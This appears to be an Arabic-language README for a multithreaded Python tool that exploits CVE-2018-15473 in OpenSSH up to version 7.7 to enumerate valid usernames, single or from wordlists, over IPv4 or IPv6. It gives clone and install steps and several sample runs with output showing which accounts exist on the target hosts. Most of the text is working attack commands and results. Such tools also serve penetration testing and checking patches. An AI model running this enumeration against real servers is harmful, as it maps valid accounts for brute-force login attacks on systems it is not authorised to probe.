
متعدد الخيوط، متوافق مع IPv6، تعداد أسماء المستخدمين عبر قوائم الكلمات/لمستخدم واحد من خلال CVE-2018-15473
OpenSSH حتى الإصدار 7.7 عرضة لثغرة تعداد المستخدمين (user enumeration) بسبب عدم تأخير الخروج المبكر لمستخدم مصادقة غير صالح حتى يتم تحليل الحزمة التي تحتوي على الطلب بالكامل، ويتعلق الأمر بالملفات auth2-gss.c وauth2-hostbased.c وauth2-pubkey.c.
قد تحتاج إلى تثبيت الحزمة المكافئة لـ openssl-dev في توزيعتك
# NOTE: if you're installing on kali, you can skip the pip install; paramiko is already there.
git clone https://gitlab.com/epi052/cve-2018-15473.git
cd cve-2018-15473
pip install -r requirements.txt
# - OR -
pipenv install -r requirements.txt # if you're cool like that
chmod u+x ssh-username-enum.py
اسم مستخدم واحد
(cve-2018-15473)─> ./ssh-username-enum.py -u epi 192.168.1.2
[+] epi found!
استخدم قائمة كلمات مع 10 خيوط (الافتراضي هو 4)
(cve-2018-15473)─> ./ssh-username-enum.py -t 10 -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt 192.168.1.2
[+] avahi found!
[+] avahi-autoipd found!
[+] backup found!
[+] daemon found!
[+] bin found!
------8<------
عنوان IPv6 على المنفذ 2222 مع زيادة مستوى الإسهاب!
(cve-2018-15473)─> ./ssh-username-enum.py -6 -p 2222 -v -w /usr/share/metasploit-framework/data/wordlists/unix_users.txt '::1'
[-] 4Dgifts not found
[-] demo not found
[-] checkfs not found
[-] anon not found
[-] EZsetup not found
[-] auditor not found
[-] demos not found
[-] OutOfBox not found
[-] checkfsys not found
[+] avahi found!
[-] diag not found
[-] ROOT not found
[-] checksys not found
[-] cmwlogin not found
[+] avahi-autoipd found!
------8<------